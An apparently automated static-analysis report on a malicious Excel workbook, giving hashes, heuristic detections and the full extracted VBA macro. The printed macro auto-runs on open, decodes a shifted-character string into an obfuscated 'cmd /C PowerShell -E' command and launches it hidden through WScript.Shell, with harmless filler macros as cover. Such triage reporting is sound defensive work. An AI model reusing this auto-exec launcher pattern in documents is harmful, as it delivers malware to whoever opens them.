Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ee001d9a6d5525c1…

MALICIOUS

Office (OOXML)

Size: 21.8 KB
Created: 2021-08-18 15:22:44 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-09-13
MD5: 872ba8206b9ecedb116ce7d04b18c3af
SHA-1: 96f5907c97ef71f961da9471d00da9b35d8be15f
SHA-256: ee001d9a6d5525c14e67b80facd7aebcad543569f25aec800ee90145097a7632
Risk Score: 232

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an OOXML document containing a Workbook_Open VBA macro. The macro uses CreateObject and WScript.Shell to run obfuscated code that includes a URL, strongly indicating an attempt to download and execute a second-stage payload. The obfuscation of the script and the presence of a URL suggest downloader or dropper functionality.

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub workbook_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://brightcarbon.com/ Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9839 bytes
SHA-256: 1953a5aeb3eeadb3e8184c404200d29e4c3fa8fb4b418c6221a4df4f89121723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub VBA_Presentation()

  Dim PAplication As PowerPoint.Application
  Dim PPT As PowerPoint.Presentation
  Dim PPTSlide As PowerPoint.Slide
  Dim PPTShapes As PowerPoint.Shape
  Dim PPTCharts As Excel.ChartObject

  Set PAplication = New PowerPoint.Application

  PAplication.Visible = msoCTrue
  PAplication.WindowState = ppWindowMaximized

End Sub
Private Sub workbook_open()
uml.sa
sda = gfdfsgfdf

End Sub
Sub InsertTextAtEndOfDocument()
 ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "uml"
' Purpose : Displays a dialog box with a Hello World text message.
' Author : Jamie Garroch
' Date : 06MAY2019
' Website : https://brightcarbon.com/
'----------------------------------------------------------------------------------
 
Sub HelloWorld()
 MsgBox "Hello World!", vbInformation + vbOKOnly, "This is my first VBA Macro"
End Sub
Sub sa()
nqg = kui(220) & kui(198) & kui(221) & kui(153) & kui(168) & kui(188) & kui(153) & kui(201) & kui(232) & kui(215) & kui(240) & kui(215) & kui(190) & kui(203) & kui(204) & kui(215) & kui(193) & kui(222) & kui(215) & kui(197) & kui(229) & kui(153) & kui(166) & kui(190) & kui(153)


On Error Resume Next
prezigsc = nqg
prntkeeanq (prezigsc)
End Sub
Sub dsffsdfds()

  Dim PAplication As PowerPoint.Application
  Dim PPT As PowerPoint.Presentation
  Dim PPTSlide As PowerPoint.Slide
  Dim PPTShapes As PowerPoint.Shape
  Dim PPTCharts As Excel.ChartObject

  Set PAplication = New PowerPoint.Application

  PAplication.Visible = msoCTrue
  PAplication.WindowState = ppWindowMaximized

  Set PPT = PAplication.Presentations.Add

  For Each PPTCharts In ActiveSheet.ChartObjects

  Next PPTCharts

End Sub

Function prntkeeanq(ekrpxyknmkrdnzqyrkywprixgukrt As String)
yqefljepodsljyziktokcr = 11 - 11
hgfh = "bfgghd jhfg gdfg"
lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol)
doatabrnwbndkkvbnbuido = vhzby.Run(ekrpxyknmkrdnzqyrkywprixgukrt, yqefljepodsljyziktokcr)
End Function

Sub InsertingSlide()
'
' Macro recorded #date# by Russell Proctor
'

   ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
   ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
   ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Select
   ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Characters(Start:=1, Length:=0).Select
   With ActiveWindow.Selection.TextRange
      .Text = "Another Slide"
      With .Font
         .Name = "Arial"
         .Size = 44
         .Bold = msoFalse
         .Italic = msoFalse
         .Underline = msoFalse
         .Shadow = msoFalse
         .Emboss = msoFalse
         .BaselineOffset = 0
         .AutorotateNumbers = msoFalse
         .Color.SchemeColor = ppTitle
      End With
   End With
End Sub
Function kui(fscv As Variant)
sdfgf = "ghtr  bfgdfj 5t64"
kui = Chr(fscv - 121)
bvcxb = "gfdsg bvxcvv gsdg et vbdfb xbcvx"
End Function
Sub dsadsa()
   ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
   ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
   ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").TextFrame.TextRange.Text = "Another Slide"
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 31232 bytes
SHA-256: ac6b85e940ac7f0111521a4103862302e6cd478eb99d3797dccd1a49a9b2df97
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 long base64-like blob(s).